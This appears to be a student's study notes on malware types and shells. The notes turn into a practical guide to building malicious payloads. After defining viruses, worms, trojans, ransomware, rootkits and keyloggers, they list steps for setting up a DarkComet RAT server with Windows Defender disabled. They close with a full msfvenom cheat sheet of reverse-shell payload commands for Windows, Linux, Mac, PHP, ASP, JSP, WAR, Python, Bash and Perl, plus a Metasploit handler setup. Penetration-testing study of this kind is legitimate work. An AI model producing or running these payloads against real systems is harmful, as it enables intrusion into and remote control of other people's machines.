eDLviWFk

1Malware 
2what is ?
3mal + ware = malicious software
4
5designed to infiltirate and damage computers without the user consent. 
6the term malware encompasses all the diff. types of threats to your computer such as :
7viruses, spywares , worms ,trojans etc.
8
9Purpose of Malware !!
10why do we need malware ? why were they created at first place ?
11> to do things without user's permission 
12> to Steal files 
13> to steal stored passwords 
14> to hijack into computer
15> to hijack core computing functions
16> to monitor the activity of the user
17> to delete sensitive personal data
18> to encrypt sensitive data 
19> to extort money
20 
21Types of Malwares :
22
231. Virus: vital info resource under sieze 
24	disrupts the normal functionality of computer 
25
26	they are genearlly masked with executable files (i.e attached to exe files)
27	the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious program.
28	Normally, the host program keeps functioning after it is infected by the virus.
29	although they can not replicate themselves outside the network . but has the ability to replicate and attach itself to other files locally 
30 	Viruses spread when the software or document they are attached to is transferred from one computer to another using the network,
31	 a disk, file sharing, or infected email attachments.
32	
332. Worm: 
34similar to viruses , replicate itself outside the n/w as well	
35self replicating without host program and spreads without any human interaction or directives from the malware authors.
36worms are standalone software and do not require a host program or human help to propagate
37A worm enters a computer through a vulnerability in the system and takes advantage of 
38file-transport or information-transport features on the system, allowing it to travel unaided
39
40stuxnet :::::::::::::    	https://www.youtube.com/watch?v=TGGxqjpka-U
41
423. Trojan 
43malicious s/w represents as valid 
44> A Trojan is another type of malware named after the wooden horse that the Greeks used to infiltrate Troy. 
45> It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems. 
46> After it is activated, it can achieve any number of attacks on the host, from irritating the user (popping up windows or changing desktops)
47 to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses). 
48> Trojans are also known to create backdoors to give malicious users access to the system. 
49> Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate. 
50> Trojans must spread through user interaction such as opening an email attachment or downloading and running a file from the Internet.
51
524. Spyware
53Software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent,
54 or that asserts control over a device without the consumer's knowledge.
55
565. Ransomware
57kind of malware that is used to extort money by infecting the user.
58it encrypt all the files on a user's system using a strong encryption algoritham. Then demands for ranson to issue a decrypting key to retrieve / decrypt the user data .
59
606. Rootkit
61Programs that hide the existence of malware by intercepting (i.e., "Hooking") and modifying operating system API calls that supply system information. 
62Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower to include a hypervisor, master boot record, or the system firmware.
63 Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.
64 Rootkits have been seen for Windows, Linux, and Mac OS X systems.
65
667. keyloggers 
67special kind of Spyware 
68The action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. 
69Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware
70-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
71
72What are shells?
73Shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device (like servers, mobile phones, etc.).
74
75Types of shells
761.	Reverse shell
772.	Bind shell
78
79Reverse shell
80A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.
81 
82Figure 1: Reverse TCP shell
83
84
85Bind shell
86Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection. 
87The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.
88 
89Figure 2: Bind TCP shell
90There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc.
91 One thing which is common between all these shells is that they all communicate over a TCP protocol.
92-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
93
94Creating Malware 
95RAT: Remote Administration tool 
96Dark Comet Example 
97
98
99
100
101
102---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
103disable windows defender 
104open dark comet 
105server module (create server) --> full editor 
106process mutex --> threads 
107n/w setting --> enter lhost lport here --> press add
108this will open a socket in attacker machine to listen for incoming connection  
109listen for connection
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
126Msfvenom
127
128Creating Metasploit Payloads
129
130Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that
131 can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler.
132 Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc.).
133 Execute and wait for the payload to be run. For the examples below it’s pretty self-explanatory but LHOST should be filled in with your IP address
134 (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.
135
136
137>how to create a malicous file ..will not be obfuscating the file/ hiding the file
138> will be using reverse tcp 
139>reverse tcp connection is noisy and hence will be detected by windows defender 
140>staging and encoding techn not covered 
141
142List payloads
143msfvenom -l payload
144
145
146msfpayload + msfencode = msfvenom
147msf - metasploit f/w
148kali needed + winodows 10 (defender disabled )
149
150--browser may detect it downloading --anitvirus may detect it ---
151msfvenom -p windows/x64/meterpreter/reverse_tcp --arch x64 --platform windows LHOST=124412 LPORT=53 -f exe -o filename
152
153-p payload
154-f format can be exe , apk , py,sh,etc. 
155-o output file name 
156LHOST local host/ listening host [ip addre of kali ]
157LPORT local port /listening port
158--arch for architecture
159--platform to explicitly specify victim platform 
160before executing 
161
162Handler on kali 
163msfconsole 
164use multi/handler
165set payload windows /x64/meterpreter/reverse_tcp
166show options 
167set lport
168set lhost
169
170metasploit  others 
171
172os specific Binaries
173Linux
174msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
175
176Windows
177msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
178Mac
179msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
180Web Payloads
181PHP
182msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
183cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
184ASP
185msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
186JSP
187msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
188WAR
189msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
190Scripting Payloads
191Python
192msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
193Bash
194msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
195
196Perl
197msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
198Shellcode
199For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
200Linux Based Shellcode
201msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
202Windows Based Shellcode
203msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
204Mac Based Shellcode
205msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>